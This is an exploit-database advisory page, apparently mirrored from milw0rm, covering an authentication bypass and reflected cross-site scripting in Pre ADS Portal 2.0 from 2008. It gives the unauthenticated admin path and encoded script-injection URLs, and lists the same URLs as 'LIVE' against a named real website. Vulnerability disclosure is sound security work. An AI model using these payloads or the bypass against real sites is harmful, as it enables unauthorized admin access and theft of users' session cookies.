header-logo
Suggest Exploit
vendor:
Pre ADS Portal
by:
G4N0K
7.5
CVSS
HIGH
Admin BYpass, XSS
79, 352
CWE
Product Name: Pre ADS Portal
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Pre ADS Portal <= 2.0 Multiple Vulnerabilities

Pre ADS Portal is prone to multiple vulnerabilities, including an authentication bypass vulnerability and multiple cross-site scripting vulnerabilities. An attacker can exploit these issues to bypass authentication and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

Mitigation:

Users should avoid following untrusted links and should never enter credentials after being redirected to a different website. Administrators should disable the affected script.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                              IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Pre ADS Portal <= 2.0 Multiple Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script:         	Pre ADS Portal
[~] Language :         	PHP
[~] Website[main]:     	http://www.preproject.com
[~] Website[script]:    http://www.preproject.com/ads.asp
[~] Type :             	Commercial
[~] Report-Date :     	05/11/2008
[~] Founder :			G4N0K <mail.ganok[at]gmail.com>

===============================================================================
===[ Admin BYpass ]===
[!] http://localhost/[path]/homeadmin/adminhome.php

===[ Admin BYpass-LIVE ]===
http://www.mideastbiz.com/homeadmin/adminhome.php



===[ XSS ]===
[!] http://localhost/[path]/homeadmin/adminhome.php?pg=1&msg=XSS
[!] http://localhost/[path]/homeadmin/signinform.php?msg=XSS

===[ XSS-LIVE ]===
[!]http://www.mideastbiz.com/homeadmin/adminhome.php?pg=1&msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C/script%3E
http://www.mideastbiz.com/homeadmin/signinform.php?msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C/script%3E



===[ Greetz ]===
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-06]